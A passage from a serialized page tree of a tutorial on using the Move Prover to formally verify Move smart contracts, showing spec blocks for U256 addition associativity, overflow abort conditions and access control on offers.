4",{"type":28,"tag":116,"props":11415,"children":11416},{"style":266},[11417],{"type":33,"value":384},{"type":28,"tag":116,"props":11419,"children":11420},{"class":245,"line":293},[11421],{"type":28,"tag":116,"props":11422,"children":11423},{"emptyLinePlaceholder":19},[11424],{"type":33,"value":1044},{"type":28,"tag":116,"props":11426,"children":11427},{"class":245,"line":361},[11428,11432,11436],{"type":28,"tag":116,"props":11429,"children":11430},{"style":266},[11431],{"type":33,"value":347},{"type":28,"tag":116,"props":11433,"children":11434},{"style":370},[11435],{"type":33,"value":9259},{"type":28,"tag":116,"props":11437,"children":11438},{"style":266},[11439],{"type":33,"value":11440},"]\n",{"type":28,"tag":116,"props":11442,"children":11443},{"class":245,"line":387},[11444],{"type":28,"tag":116,"props":11445,"children":11446},{"emptyLinePlaceholder":19},[11447],{"type":33,"value":1044},{"type":28,"tag":116,"props":11449,"children":11450},{"class":245,"line":400},[11451,11456,11460,11464,11468],{"type":28,"tag":116,"props":11452,"children":11453},{"style":376},[11454],{"type":33,"value":11455},"let",{"type":28,"tag":116,"props":11457,"children":11458},{"style":272},[11459],{"type":33,"value":3068},{"type":28,"tag":116,"props":11461,"children":11462},{"style":370},[11463],{"type":33,"value":2226},{"type":28,"tag":116,"props":11465,"children":11466},{"style":350},[11467],{"type":33,"value":2718},{"type":28,"tag":116,"props":11469,"children":11470},{"style":266},[11471],{"type":33,"value":384},{"type":28,"tag":116,"props":11473,"children":11474},{"class":245,"line":614},[11475,11479,11483,11487,11491],{"type":28,"tag":116,"props":11476,"children":11477},{"style":260},[11478],{"type":33,"value":11129},{"type":28,"tag":116,"props":11480,"children":11481},{"style":266},[11482],{"type":33,"value":269},{"type":28,"tag":116,"props":11484,"children":11485},{"style":272},[11486],{"type":33,"value":3408},{"type":28,"tag":116,"props":11488,"children":11489},{"style":370},[11490],{"type":33,"value":8391},{"type":28,"tag":116,"props":11492,"children":11493},{"style":266},[11494],{"type":33,"value":11495}," WORDS) {\n",{"type":28,"tag":116,"props":11497,"children":11498},{"class":245,"line":631},[11499,11503,11508,11512,11517,11521,11525,11529,11533,11537],{"type":28,"tag":116,"props":11500,"children":11501},{"style":376},[11502],{"type":33,"value":2672},{"type":28,"tag":116,"props":11504,"children":11505},{"style":272},[11506],{"type":33,"value":11507}," a1",{"type":28,"tag":116,"props":11509,"children":11510},{"style":370},[11511],{"type":33,"value":2226},{"type":28,"tag":116,"props":11513,"children":11514},{"style":282},[11515],{"type":33,"value":11516}," get",{"type":28,"tag":116,"props":11518,"children":11519},{"style":266},[11520],{"type":33,"value":313},{"type":28,"tag":116,"props":11522,"children":11523},{"style":370},[11524],{"type":33,"value":2780},{"type":28,"tag":116,"props":11526,"children":11527},{"style":272},[11528],{"type":33,"value":87},{"type":28,"tag":116,"props":11530,"children":11531},{"style":266},[11532],{"type":33,"value":825},{"type":28,"tag":116,"props":11534,"children":11535},{"style":272},[11536],{"type":33,"value":3408},{"type":28,"tag":116,"props":11538,"children":11539},{"style":266},[11540],{"type":33,"value":895},{"type":28,"tag":116,"props":11542,"children":11543},{"class":245,"line":665},[11544,11548,11553,11557,11561,11565,11569,11573,11577,11581],{"type":28,"tag":116,"props":11545,"children":11546},{"style":376},[11547],{"type":33,"value":2672},{"type":28,"tag":116,"props":11549,"children":11550},{"style":272},[11551],{"type":33,"value":11552}," b1",{"type":28,"tag":116,"props":11554,"children":11555},{"style":370},[11556],{"type":33,"value":2226},{"type":28,"tag":116,"props":11558,"children":11559},{"style":282},[11560],{"type":33,"value":11516},{"type":28,"tag":116,"props":11562,"children":11563},{"style":266},[11564],{"type":33,"value":313},{"type":28,"tag":116,"props":11566,"children":11567},{"style":370},[11568],{"type":33,"value":2780},{"type":28,"tag":116,"props":11570,"children":11571},{"style":272},[11572],{"type":33,"value":2893},{"type":28,"tag":116,"props":11574,"children":11575},{"style":266},[11576],{"type":33,"value":825},{"type":28,"tag":116,"props":11578,"children":11579},{"style":272},[11580],{"type":33,"value":3408},{"type":28,"tag":116,"props":11582,"children":11583},{"style":266},[11584],{"type":33,"value":895},{"type":28,"tag":116,"props":11586,"children":11587},{"class":245,"line":713},[11588],{"type":28,"tag":116,"props":11589,"children":11590},{"emptyLinePlaceholder":19},[11591],{"type":33,"value":1044},{"type":28,"tag":116,"props":11593,"children":11594},{"class":245,"line":750},[11595,11599,11603],{"type":28,"tag":116,"props":11596,"children":11597},{"style":266},[11598],{"type":33,"value":347},{"type":28,"tag":116,"props":11600,"children":11601},{"style":370},[11602],{"type":33,"value":9259},{"type":28,"tag":116,"props":11604,"children":11605},{"style":266},[11606],{"type":33,"value":11440},{"type":28,"tag":29,"props":11608,"children":11609},{},[11610],{"type":33,"value":11611},"Unrolling the function and running again the Move Prover will print out a \"Success\" message!",{"type":28,"tag":234,"props":11613,"children":11615},{"code":11614},"SUCCESS proving 1 modules from package `u256` in 9.685s\n{\n    \"Result\": \"Success\"\n}\n",[11616],{"type":28,"tag":98,"props":11617,"children":11618},{"__ignoreMap":7},[11619],{"type":33,"value":11614},{"type":28,"tag":29,"props":11621,"children":11622},{},[11623,11625,11630,11631,11637],{"type":33,"value":11624},"For the ",{"type":28,"tag":4995,"props":11626,"children":11627},{},[11628],{"type":33,"value":11629},"Associative Property",{"type":33,"value":269},{"type":28,"tag":98,"props":11632,"children":11634},{"className":11633},[],[11635],{"type":33,"value":11636},"a+(b+c) = (a+b)+c",{"type":33,"value":11638},") to be true, changing the grouping of addends should not change the sum. To verify this, we will first implement a function which simulates this property:",{"type":28,"tag":234,"props":11640,"children":11642},{"code":11641,"language":2651,"meta":7,"className":2652,"style":7},"fun add_assoc_property(a: U256, b: U256, c: U256): bool {\n    let result_1 = add(b, c);\n    let result_11 = add(a, result_1);\n    let result_2 = add(a, b);\n    let result_22 = add(c, result_2);\n\n    let cmp = compare(&result_11, &result_22);\n    if ( cmp == EQUAL ) true else false\n}\n",[11643],{"type":28,"tag":98,"props":11644,"children":11645},{"__ignoreMap":7},[11646,11723,11762,11803,11842,11883,11890,11940,11980],{"type":28,"tag":116,"props":11647,"children":11648},{"class":245,"line":246},[11649,11653,11658,11662,11666,11670,11674,11678,11682,11686,11690,11694,11698,11702,11706,11710,11714,11719],{"type":28,"tag":116,"props":11650,"children":11651},{"style":272},[11652],{"type":33,"value":6779},{"type":28,"tag":116,"props":11654,"children":11655},{"style":282},[11656],{"type":33,"value":11657}," add_assoc_property",{"type":28,"tag":116,"props":11659,"children":11660},{"style":266},[11661],{"type":33,"value":313},{"type":28,"tag":116,"props":11663,"children":11664},{"style":272},[11665],{"type":33,"value":87},{"type":28,"tag":116,"props":11667,"children":11668},{"style":370},[11669],{"type":33,"value":4160},{"type":28,"tag":116,"props":11671,"children":11672},{"style":339},[11673],{"type":33,"value":4400},{"type":28,"tag":116,"props":11675,"children":11676},{"style":266},[11677],{"type":33,"value":825},{"type":28,"tag":116,"props":11679,"children":11680},{"style":272},[11681],{"type":33,"value":2893},{"type":28,"tag":116,"props":11683,"children":11684},{"style":370},[11685],{"type":33,"value":4160},{"type":28,"tag":116,"props":11687,"children":11688},{"style":339},[11689],{"type":33,"value":4400},{"type":28,"tag":116,"props":11691,"children":11692},{"style":266},[11693],{"type":33,"value":825},{"type":28,"tag":116,"props":11695,"children":11696},{"style":272},[11697],{"type":33,"value":1797},{"type":28,"tag":116,"props":11699,"children":11700},{"style":370},[11701],{"type":33,"value":4160},{"type":28,"tag":116,"props":11703,"children":11704},{"style":339},[11705],{"type":33,"value":4400},{"type":28,"tag":116,"props":11707,"children":11708},{"style":266},[11709],{"type":33,"value":1829},{"type":28,"tag":116,"props":11711,"children":11712},{"style":370},[11713],{"type":33,"value":4160},{"type":28,"tag":116,"props":11715,"children":11716},{"style":339},[11717],{"type":33,"value":11718}," bool",{"type":28,"tag":116,"props":11720,"children":11721},{"style":266},[11722],{"type":33,"value":1291},{"type":28,"tag":116,"props":11724,"children":11725},{"class":245,"line":256},[11726,11730,11734,11738,11742,11746,11750,11754,11758],{"type":28,"tag":116,"props":11727,"children":11728},{"style":376},[11729],{"type":33,"value":2672},{"type":28,"tag":116,"props":11731,"children":11732},{"style":272},[11733],{"type":33,"value":7864},{"type":28,"tag":116,"props":11735,"children":11736},{"style":370},[11737],{"type":33,"value":2226},{"type":28,"tag":116,"props":11739,"children":11740},{"style":282},[11741],{"type":33,"value":9249},{"type":28,"tag":116,"props":11743,"children":11744},{"style":266},[11745],{"type":33,"value":313},{"type":28,"tag":116,"props":11747,"children":11748},{"style":272},[11749],{"type":33,"value":2893},{"type":28,"tag":116,"props":11751,"children":11752},{"style":266},[11753],{"type":33,"value":825},{"type":28,"tag":116,"props":11755,"children":11756},{"style":272},[11757],{"type":33,"value":1797},{"type":28,"tag":116,"props":11759,"children":11760},{"style":266},[11761],{"type":33,"value":895},{"type":28,"tag":116,"props":11763,"children":11764},{"class":245,"line":293},[11765,11769,11774,11778,11782,11786,11790,11794,11799],{"type":28,"tag":116,"props":11766,"children":11767},{"style":376},[11768],{"type":33,"value":2672},{"type":28,"tag":116,"props":11770,"children":11771},{"style":272},[11772],{"type":33,"value":11773}," result_11",{"type":28,"tag":116,"props":11775,"children":11776},{"style":370},[11777],{"type":33,"value":2226},{"type":28,"tag":116,"props":11779,"children":11780},{"style":282},[11781],{"type":33,"value":9249},{"type":28,"tag":116,"props":11783,"children":11784},{"style":266},[11785],{"type":33,"value":313},{"type":28,"tag":116,"props":11787,"children":11788},{"style":272},[11789],{"type":33,"value":87},{"type":28,"tag":116,"props":11791,"children":11792},{"style":266},[11793],{"type":33,"value":825},{"type":28,"tag":116,"props":11795,"children":11796},{"style":272},[11797],{"type":33,"value":11798},"result_1",{"type":28,"tag":116,"props":11800,"children":11801},{"style":266},[11802],{"type":33,"value":895},{"type":28,"tag":116,"props":11804,"children":11805},{"class":245,"line":361},[11806,11810,11814,11818,11822,11826,11830,11834,11838],{"type":28,"tag":116,"props":11807,"children":11808},{"style":376},[11809],{"type":33,"value":2672},{"type":28,"tag":116,"props":11811,"children":11812},{"style":272},[11813],{"type":33,"value":7890},{"type":28,"tag":116,"props":11815,"children":11816},{"style":370},[11817],{"type":33,"value":2226},{"type":28,"tag":116,"props":11819,"children":11820},{"style":282},[11821],{"type":33,"value":9249},{"type":28,"tag":116,"props":11823,"children":11824},{"style":266},[11825],{"type":33,"value":313},{"type":28,"tag":116,"props":11827,"children":11828},{"style":272},[11829],{"type":33,"value":87},{"type":28,"tag":116,"props":11831,"children":11832},{"style":266},[11833],{"type":33,"value":825},{"type":28,"tag":116,"props":11835,"children":11836},{"style":272},[11837],{"type":33,"value":2893},{"type":28,"tag":116,"props":11839,"children":11840},{"style":266},[11841],{"type":33,"value":895},{"type":28,"tag":116,"props":11843,"children":11844},{"class":245,"line":387},[11845,11849,11854,11858,11862,11866,11870,11874,11879],{"type":28,"tag":116,"props":11846,"children":11847},{"style":376},[11848],{"type":33,"value":2672},{"type":28,"tag":116,"props":11850,"children":11851},{"style":272},[11852],{"type":33,"value":11853}," result_22",{"type":28,"tag":116,"props":11855,"children":11856},{"style":370},[11857],{"type":33,"value":2226},{"type":28,"tag":116,"props":11859,"children":11860},{"style":282},[11861],{"type":33,"value":9249},{"type":28,"tag":116,"props":11863,"children":11864},{"style":266},[11865],{"type":33,"value":313},{"type":28,"tag":116,"props":11867,"children":11868},{"style":272},[11869],{"type":33,"value":1797},{"type":28,"tag":116,"props":11871,"children":11872},{"style":266},[11873],{"type":33,"value":825},{"type":28,"tag":116,"props":11875,"children":11876},{"style":272},[11877],{"type":33,"value":11878},"result_2",{"type":28,"tag":116,"props":11880,"children":11881},{"style":266},[11882],{"type":33,"value":895},{"type":28,"tag":116,"props":11884,"children":11885},{"class":245,"line":400},[11886],{"type":28,"tag":116,"props":11887,"children":11888},{"emptyLinePlaceholder":19},[11889],{"type":33,"value":1044},{"type":28,"tag":116,"props":11891,"children":11892},{"class":245,"line":614},[11893,11897,11901,11905,11910,11914,11918,11923,11927,11931,11936],{"type":28,"tag":116,"props":11894,"children":11895},{"style":376},[11896],{"type":33,"value":2672},{"type":28,"tag":116,"props":11898,"children":11899},{"style":272},[11900],{"type":33,"value":7532},{"type":28,"tag":116,"props":11902,"children":11903},{"style":370},[11904],{"type":33,"value":2226},{"type":28,"tag":116,"props":11906,"children":11907},{"style":282},[11908],{"type":33,"value":11909}," compare",{"type":28,"tag":116,"props":11911,"children":11912},{"style":266},[11913],{"type":33,"value":313},{"type":28,"tag":116,"props":11915,"children":11916},{"style":370},[11917],{"type":33,"value":2780},{"type":28,"tag":116,"props":11919,"children":11920},{"style":272},[11921],{"type":33,"value":11922},"result_11",{"type":28,"tag":116,"props":11924,"children":11925},{"style":266},[11926],{"type":33,"value":825},{"type":28,"tag":116,"props":11928,"children":11929},{"style":370},[11930],{"type":33,"value":2780},{"type":28,"tag":116,"props":11932,"children":11933},{"style":272},[11934],{"type":33,"value":11935},"result_22",{"type":28,"tag":116,"props":11937,"children":11938},{"style":266},[11939],{"type":33,"value":895},{"type":28,"tag":116,"props":11941,"children":11942},{"class":245,"line":631},[11943,11948,11953,11957,11961,11966,11970,11975],{"type":28,"tag":116,"props":11944,"children":11945},{"style":260},[11946],{"type":33,"value":11947},"    if",{"type":28,"tag":116,"props":11949,"children":11950},{"style":266},[11951],{"type":33,"value":11952}," ( ",{"type":28,"tag":116,"props":11954,"children":11955},{"style":272},[11956],{"type":33,"value":7597},{"type":28,"tag":116,"props":11958,"children":11959},{"style":370},[11960],{"type":33,"value":2953},{"type":28,"tag":116,"props":11962,"children":11963},{"style":266},[11964],{"type":33,"value":11965}," EQUAL ) ",{"type":28,"tag":116,"props":11967,"children":11968},{"style":376},[11969],{"type":33,"value":3664},{"type":28,"tag":116,"props":11971,"children":11972},{"style":260},[11973],{"type":33,"value":11974}," else",{"type":28,"tag":116,"props":11976,"children":11977},{"style":376},[11978],{"type":33,"value":11979}," false\n",{"type":28,"tag":116,"props":11981,"children":11982},{"class":245,"line":665},[11983],{"type":28,"tag":116,"props":11984,"children":11985},{"style":266},[11986],{"type":33,"value":406},{"type":28,"tag":29,"props":11988,"children":11989},{},[11990],{"type":33,"value":11991},"Lastly, we want to create a spec block which aborts if the sum overflows, and ensures that the result of the function is true:",{"type":28,"tag":234,"props":11993,"children":11995},{"code":11994,"language":2651,"meta":7,"className":2652,"style":7},"spec add_assoc_property {\n    aborts_if (value_of_U256(a) + value_of_U256(b)) + value_of_U256(c) >= P64 * P64 * P64 * P64;\n    ensures result == true;\n}\n",[11996],{"type":28,"tag":98,"props":11997,"children":11998},{"__ignoreMap":7},[11999,12014,12118,12141],{"type":28,"tag":116,"props":12000,"children":12001},{"class":245,"line":246},[12002,12006,12010],{"type":28,"tag":116,"props":12003,"children":12004},{"style":272},[12005],{"type":33,"value":7947},{"type":28,"tag":116,"props":12007,"children":12008},{"style":272},[12009],{"type":33,"value":11657},{"type":28,"tag":116,"props":12011,"children":12012},{"style":266},[12013],{"type":33,"value":1291},{"type":28,"tag":116,"props":12015,"children":12016},{"class":245,"line":256},[12017,12021,12025,12030,12034,12038,12042,12046,12050,12054,12058,12062,12066,12070,12074,12078,12082,12086,12090,12094,12098,12102,12106,12110,12114],{"type":28,"tag":116,"props":12018,"children":12019},{"style":272},[12020],{"type":33,"value":9570},{"type":28,"tag":116,"props":12022,"children":12023},{"style":266},[12024],{"type":33,"value":269},{"type":28,"tag":116,"props":12026,"children":12027},{"style":282},[12028],{"type":33,"value":12029},"value_of_U256",{"type":28,"tag":116,"props":12031,"children":12032},{"style":266},[12033],{"type":33,"value":313},{"type":28,"tag":116,"props":12035,"children":12036},{"style":272},[12037],{"type":33,"value":87},{"type":28,"tag":116,"props":12039,"children":12040},{"style":266},[12041],{"type":33,"value":1609},{"type":28,"tag":116,"props":12043,"children":12044},{"style":370},[12045],{"type":33,"value":2268},{"type":28,"tag":116,"props":12047,"children":12048},{"style":282},[12049],{"type":33,"value":9372},{"type":28,"tag":116,"props":12051,"children":12052},{"style":266},[12053],{"type":33,"value":313},{"type":28,"tag":116,"props":12055,"children":12056},{"style":272},[12057],{"type":33,"value":2893},{"type":28,"tag":116,"props":12059,"children":12060},{"style":266},[12061],{"type":33,"value":2390},{"type":28,"tag":116,"props":12063,"children":12064},{"style":370},[12065],{"type":33,"value":2268},{"type":28,"tag":116,"props":12067,"children":12068},{"style":282},[12069],{"type":33,"value":9372},{"type":28,"tag":116,"props":12071,"children":12072},{"style":266},[12073],{"type":33,"value":313},{"type":28,"tag":116,"props":12075,"children":12076},{"style":272},[12077],{"type":33,"value":1797},{"type":28,"tag":116,"props":12079,"children":12080},{"style":266},[12081],{"type":33,"value":1609},{"type":28,"tag":116,"props":12083,"children":12084},{"style":370},[12085],{"type":33,"value":9611},{"type":28,"tag":116,"props":12087,"children":12088},{"style":339},[12089],{"type":33,"value":9328},{"type":28,"tag":116,"props":12091,"children":12092},{"style":370},[12093],{"type":33,"value":9484},{"type":28,"tag":116,"props":12095,"children":12096},{"style":339},[12097],{"type":33,"value":9328},{"type":28,"tag":116,"props":12099,"children":12100},{"style":370},[12101],{"type":33,"value":9484},{"type":28,"tag":116,"props":12103,"children":12104},{"style":339},[12105],{"type":33,"value":9328},{"type":28,"tag":116,"props":12107,"children":12108},{"style":370},[12109],{"type":33,"value":9484},{"type":28,"tag":116,"props":12111,"children":12112},{"style":339},[12113],{"type":33,"value":9328},{"type":28,"tag":116,"props":12115,"children":12116},{"style":266},[12117],{"type":33,"value":384},{"type":28,"tag":116,"props":12119,"children":12120},{"class":245,"line":293},[12121,12125,12129,12133,12137],{"type":28,"tag":116,"props":12122,"children":12123},{"style":272},[12124],{"type":33,"value":9868},{"type":28,"tag":116,"props":12126,"children":12127},{"style":272},[12128],{"type":33,"value":8828},{"type":28,"tag":116,"props":12130,"children":12131},{"style":370},[12132],{"type":33,"value":2953},{"type":28,"tag":116,"props":12134,"children":12135},{"style":376},[12136],{"type":33,"value":1129},{"type":28,"tag":116,"props":12138,"children":12139},{"style":266},[12140],{"type":33,"value":384},{"type":28,"tag":116,"props":12142,"children":12143},{"class":245,"line":361},[12144],{"type":28,"tag":116,"props":12145,"children":12146},{"style":266},[12147],{"type":33,"value":406},{"type":28,"tag":29,"props":12149,"children":12150},{},[12151],{"type":33,"value":12152},"Running move prover with the new specifications, we can confirm that there are no verification errors:",{"type":28,"tag":234,"props":12154,"children":12155},{"code":11614},[12156],{"type":28,"tag":98,"props":12157,"children":12158},{"__ignoreMap":7},[12159],{"type":33,"value":11614},{"type":28,"tag":29,"props":12161,"children":12162},{},[12163,12165,12172],{"type":33,"value":12164},"For a more complete document detailing Move Prover syntax, we recommend referring to ",{"type":28,"tag":87,"props":12166,"children":12169},{"href":12167,"rel":12168},"https://github.com/move-language/move/blob/main/language/move-prover/doc/user/spec-lang.md",[91],[12170],{"type":33,"value":12171},"spec-lang.md",{"type":33,"value":12173}," in the Move Repository.",{"type":28,"tag":63,"props":12175,"children":12177},{"id":12176},"use-cases",[12178],{"type":33,"value":12179},"Use Cases",{"type":28,"tag":29,"props":12181,"children":12182},{},[12183],{"type":33,"value":12184},"Formal verification can prove that a smart contract satisfies the given requirements for all possible cases without even running the contract. The hard part is coming up with the specifications.",{"type":28,"tag":29,"props":12186,"children":12187},{},[12188],{"type":33,"value":12189},"Here, we hope to explore some practical examples of possible verification ideas.",{"type":28,"tag":75,"props":12191,"children":12193},{"id":12192},"error-conditions",[12194],{"type":33,"value":12195},"Error Conditions",{"type":28,"tag":29,"props":12197,"children":12198},{},[12199,12201,12207],{"type":33,"value":12200},"Taking an example from ",{"type":28,"tag":98,"props":12202,"children":12204},{"className":12203},[],[12205],{"type":33,"value":12206},"std::fixed_point32",{"type":33,"value":12208},", it's often useful to explicitly define when a function might abort. For example, arithmetic operations with fixed point numbers should only error if they overflow.",{"type":28,"tag":234,"props":12210,"children":12212},{"code":12211,"language":2651,"meta":7,"className":2652,"style":7},"      spec schema MultiplyAbortsIf {\n          val: num;\n          multiplier: FixedPoint32;\n          aborts_if spec_multiply_u64(val, multiplier) > MAX_U64 with EMULTIPLICATION;\n      }\n      spec fun spec_multiply_u64(val: num, multiplier: FixedPoint32): num {\n          (val * multiplier.value) >> 32\n      }\n",[12213],{"type":28,"tag":98,"props":12214,"children":12215},{"__ignoreMap":7},[12216,12237,12257,12278,12324,12331,12394,12433],{"type":28,"tag":116,"props":12217,"children":12218},{"class":245,"line":246},[12219,12223,12228,12233],{"type":28,"tag":116,"props":12220,"children":12221},{"style":272},[12222],{"type":33,"value":8599},{"type":28,"tag":116,"props":12224,"children":12225},{"style":272},[12226],{"type":33,"value":12227}," schema",{"type":28,"tag":116,"props":12229,"children":12230},{"style":339},[12231],{"type":33,"value":12232}," MultiplyAbortsIf",{"type":28,"tag":116,"props":12234,"children":12235},{"style":266},[12236],{"type":33,"value":1291},{"type":28,"tag":116,"props":12238,"children":12239},{"class":245,"line":256},[12240,12245,12249,12253],{"type":28,"tag":116,"props":12241,"children":12242},{"style":272},[12243],{"type":33,"value":12244},"          val",{"type":28,"tag":116,"props":12246,"children":12247},{"style":370},[12248],{"type":33,"value":4160},{"type":28,"tag":116,"props":12250,"children":12251},{"style":272},[12252],{"type":33,"value":9401},{"type":28,"tag":116,"props":12254,"children":12255},{"style":266},[12256],{"type":33,"value":384},{"type":28,"tag":116,"props":12258,"children":12259},{"class":245,"line":293},[12260,12265,12269,12274],{"type":28,"tag":116,"props":12261,"children":12262},{"style":272},[12263],{"type":33,"value":12264},"          multiplier",{"type":28,"tag":116,"props":12266,"children":12267},{"style":370},[12268],{"type":33,"value":4160},{"type":28,"tag":116,"props":12270,"children":12271},{"style":339},[12272],{"type":33,"value":12273}," FixedPoint32",{"type":28,"tag":116,"props":12275,"children":12276},{"style":266},[12277],{"type":33,"value":384},{"type":28,"tag":116,"props":12279,"children":12280},{"class":245,"line":361},[12281,12286,12291,12295,12300,12304,12309,12314,12319],{"type":28,"tag":116,"props":12282,"children":12283},{"style":272},[12284],{"type":33,"value":12285},"          aborts_if",{"type":28,"tag":116,"props":12287,"children":12288},{"style":282},[12289],{"type":33,"value":12290}," spec_multiply_u64",{"type":28,"tag":116,"props":12292,"children":12293},{"style":266},[12294],{"type":33,"value":313},{"type":28,"tag":116,"props":12296,"children":12297},{"style":272},[12298],{"type":33,"value":12299},"val",{"type":28,"tag":116,"props":12301,"children":12302},{"style":266},[12303],{"type":33,"value":825},{"type":28,"tag":116,"props":12305,"children":12306},{"style":272},[12307],{"type":33,"value":12308},"multiplier",{"type":28,"tag":116,"props":12310,"children":12311},{"style":266},[12312],{"type":33,"value":12313},") > MAX_U64 ",{"type":28,"tag":116,"props":12315,"children":12316},{"style":272},[12317],{"type":33,"value":12318},"with",{"type":28,"tag":116,"props":12320,"children":12321},{"style":266},[12322],{"type":33,"value":12323}," EMULTIPLICATION;\n",{"type":28,"tag":116,"props":12325,"children":12326},{"class":245,"line":387},[12327],{"type":28,"tag":116,"props":12328,"children":12329},{"style":266},[12330],{"type":33,"value":2444},{"type":28,"tag":116,"props":12332,"children":12333},{"class":245,"line":400},[12334,12338,12342,12346,12350,12354,12358,12362,12366,12370,12374,12378,12382,12386,12390],{"type":28,"tag":116,"props":12335,"children":12336},{"style":272},[12337],{"type":33,"value":8599},{"type":28,"tag":116,"props":12339,"children":12340},{"style":272},[12341],{"type":33,"value":5878},{"type":28,"tag":116,"props":12343,"children":12344},{"style":282},[12345],{"type":33,"value":12290},{"type":28,"tag":116,"props":12347,"children":12348},{"style":266},[12349],{"type":33,"value":313},{"type":28,"tag":116,"props":12351,"children":12352},{"style":272},[12353],{"type":33,"value":12299},{"type":28,"tag":116,"props":12355,"children":12356},{"style":370},[12357],{"type":33,"value":4160},{"type":28,"tag":116,"props":12359,"children":12360},{"style":272},[12361],{"type":33,"value":9401},{"type":28,"tag":116,"props":12363,"children":12364},{"style":266},[12365],{"type":33,"value":825},{"type":28,"tag":116,"props":12367,"children":12368},{"style":272},[12369],{"type":33,"value":12308},{"type":28,"tag":116,"props":12371,"children":12372},{"style":370},[12373],{"type":33,"value":4160},{"type":28,"tag":116,"props":12375,"children":12376},{"style":339},[12377],{"type":33,"value":12273},{"type":28,"tag":116,"props":12379,"children":12380},{"style":266},[12381],{"type":33,"value":1829},{"type":28,"tag":116,"props":12383,"children":12384},{"style":370},[12385],{"type":33,"value":4160},{"type":28,"tag":116,"props":12387,"children":12388},{"style":272},[12389],{"type":33,"value":9401},{"type":28,"tag":116,"props":12391,"children":12392},{"style":266},[12393],{"type":33,"value":1291},{"type":28,"tag":116,"props":12395,"children":12396},{"class":245,"line":614},[12397,12401,12405,12409,12414,12418,12423,12428],{"type":28,"tag":116,"props":12398,"children":12399},{"style":266},[12400],{"type":33,"value":8382},{"type":28,"tag":116,"props":12402,"children":12403},{"style":272},[12404],{"type":33,"value":12299},{"type":28,"tag":116,"props":12406,"children":12407},{"style":370},[12408],{"type":33,"value":9484},{"type":28,"tag":116,"props":12410,"children":12411},{"style":272},[12412],{"type":33,"value":12413}," multiplier",{"type":28,"tag":116,"props":12415,"children":12416},{"style":370},[12417],{"type":33,"value":141},{"type":28,"tag":116,"props":12419,"children":12420},{"style":266},[12421],{"type":33,"value":12422},"value) ",{"type":28,"tag":116,"props":12424,"children":12425},{"style":370},[12426],{"type":33,"value":12427},">>",{"type":28,"tag":116,"props":12429,"children":12430},{"style":350},[12431],{"type":33,"value":12432}," 32\n",{"type":28,"tag":116,"props":12434,"children":12435},{"class":245,"line":631},[12436],{"type":28,"tag":116,"props":12437,"children":12438},{"style":266},[12439],{"type":33,"value":2444},{"type":28,"tag":75,"props":12441,"children":12443},{"id":12442},"access-control-policies",[12444],{"type":33,"value":12445},"Access Control Policies",{"type":28,"tag":29,"props":12447,"children":12448},{},[12449],{"type":33,"value":12450},"Somewhat similar to error conditions, it's often useful to enforce explicit access control policies at the specification level.",{"type":28,"tag":29,"props":12452,"children":12453},{},[12454,12456,12462,12464,12469],{"type":33,"value":12455},"For example, in ",{"type":28,"tag":98,"props":12457,"children":12459},{"className":12458},[],[12460],{"type":33,"value":12461},"std::offer",{"type":33,"value":12463}," we are able to see that the function should abort if and only if there does not exist an offer, ",{"type":28,"tag":2583,"props":12465,"children":12466},{},[12467],{"type":33,"value":12468},"or",{"type":33,"value":12470}," the recipient is now allowed.",{"type":28,"tag":234,"props":12472,"children":12474},{"code":12473,"language":2651,"meta":7,"className":2652,"style":7},"    spec redeem {\n      /// Aborts if there is no offer under `offer_address` or if the account\n      /// cannot redeem the offer.\n      /// Ensures that the offered struct under `offer_address` is removed.\n      aborts_if !exists\u003COffer\u003COffered>>(offer_address);\n      aborts_if !is_allowed_recipient\u003COffered>(offer_address, signer::address_of(account));\n      ensures !exists\u003COffer\u003COffered>>(offer_address);\n      ensures result == old(global\u003COffer\u003COffered>>(offer_address).offered);\n    }\n",[12475],{"type":28,"tag":98,"props":12476,"children":12477},{"__ignoreMap":7},[12478,12495,12503,12511,12519,12566,12624,12667,12733],{"type":28,"tag":116,"props":12479,"children":12480},{"class":245,"line":246},[12481,12486,12491],{"type":28,"tag":116,"props":12482,"children":12483},{"style":272},[12484],{"type":33,"value":12485},"    spec",{"type":28,"tag":116,"props":12487,"children":12488},{"style":272},[12489],{"type":33,"value":12490}," redeem",{"type":28,"tag":116,"props":12492,"children":12493},{"style":266},[12494],{"type":33,"value":1291},{"type":28,"tag":116,"props":12496,"children":12497},{"class":245,"line":256},[12498],{"type":28,"tag":116,"props":12499,"children":12500},{"style":250},[12501],{"type":33,"value":12502},"      /// Aborts if there is no offer under `offer_address` or if the account\n",{"type":28,"tag":116,"props":12504,"children":12505},{"class":245,"line":293},[12506],{"type":28,"tag":116,"props":12507,"children":12508},{"style":250},[12509],{"type":33,"value":12510},"      /// cannot redeem the offer.\n",{"type":28,"tag":116,"props":12512,"children":12513},{"class":245,"line":361},[12514],{"type":28,"tag":116,"props":12515,"children":12516},{"style":250},[12517],{"type":33,"value":12518},"      /// Ensures that the offered struct under `offer_address` is removed.\n",{"type":28,"tag":116,"props":12520,"children":12521},{"class":245,"line":387},[12522,12526,12531,12535,12539,12544,12548,12553,12557,12562],{"type":28,"tag":116,"props":12523,"children":12524},{"style":272},[12525],{"type":33,"value":8723},{"type":28,"tag":116,"props":12527,"children":12528},{"style":370},[12529],{"type":33,"value":12530}," !",{"type":28,"tag":116,"props":12532,"children":12533},{"style":272},[12534],{"type":33,"value":6376},{"type":28,"tag":116,"props":12536,"children":12537},{"style":266},[12538],{"type":33,"value":514},{"type":28,"tag":116,"props":12540,"children":12541},{"style":339},[12542],{"type":33,"value":12543},"Offer",{"type":28,"tag":116,"props":12545,"children":12546},{"style":266},[12547],{"type":33,"value":514},{"type":28,"tag":116,"props":12549,"children":12550},{"style":339},[12551],{"type":33,"value":12552},"Offered",{"type":28,"tag":116,"props":12554,"children":12555},{"style":266},[12556],{"type":33,"value":6398},{"type":28,"tag":116,"props":12558,"children":12559},{"style":272},[12560],{"type":33,"value":12561},"offer_address",{"type":28,"tag":116,"props":12563,"children":12564},{"style":266},[12565],{"type":33,"value":895},{"type":28,"tag":116,"props":12567,"children":12568},{"class":245,"line":400},[12569,12573,12577,12582,12586,12590,12594,12598,12603,12607,12611,12615,12620],{"type":28,"tag":116,"props":12570,"children":12571},{"style":272},[12572],{"type":33,"value":8723},{"type":28,"tag":116,"props":12574,"children":12575},{"style":370},[12576],{"type":33,"value":12530},{"type":28,"tag":116,"props":12578,"children":12579},{"style":272},[12580],{"type":33,"value":12581},"is_allowed_recipient",{"type":28,"tag":116,"props":12583,"children":12584},{"style":266},[12585],{"type":33,"value":514},{"type":28,"tag":116,"props":12587,"children":12588},{"style":339},[12589],{"type":33,"value